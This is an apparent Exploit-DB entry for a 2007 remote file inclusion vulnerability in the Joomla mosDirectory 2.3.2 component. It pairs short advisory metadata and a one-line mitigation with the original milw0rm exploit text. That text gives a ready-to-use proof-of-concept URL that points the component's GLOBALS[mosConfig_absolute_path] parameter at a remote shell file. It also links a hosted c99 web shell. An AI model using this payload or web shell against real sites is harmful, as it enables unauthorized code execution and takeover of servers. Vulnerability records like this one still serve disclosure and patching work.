Joomla Component mosDirectory 2.3.2 Remote File Inclusion

vendor:

mosDirectory

by:

ShockShadow - Electronic Security Team

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: mosDirectory

Affected Version From: 2.3.2002

Affected Version To: 2.3.2002

Patch Exists: NO

Related CWE:

CPE: a:joomla:mosdirectory:2.3.2

Metasploit:

Other Scripts:

Platforms Tested:

2007

Joomla Component mosDirectory 2.3.2 Remote File Inclusion

The Joomla Component mosDirectory 2.3.2 is vulnerable to Remote File Inclusion. An attacker can exploit this vulnerability to include a remote file and execute arbitrary code on the target system.

Mitigation:

Update to a patched version of the software or apply appropriate security measures to prevent unauthorized file inclusion.

Source

Exploit-DB raw data:

--==+=================== Electronic Security Team (www.Yee7.com) =================+==--
--==+          Joomla Component mosDirectory 2.3.2 Remote File Inclusion          +==--
--==+=============================================================================+==--

Software:     Joomla Component mosDirectory 2.3.2
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.box.net/shared/kdp2h6dbe1
txtShell:     http://yee7.com/shells/c99.txt

##############################

==============
Dork: priv8 ;)

PoC:
http://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt?
###############################

by: ShockShadow
Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye
AND ALL Yee7.com members

# milw0rm.com [2007-12-24]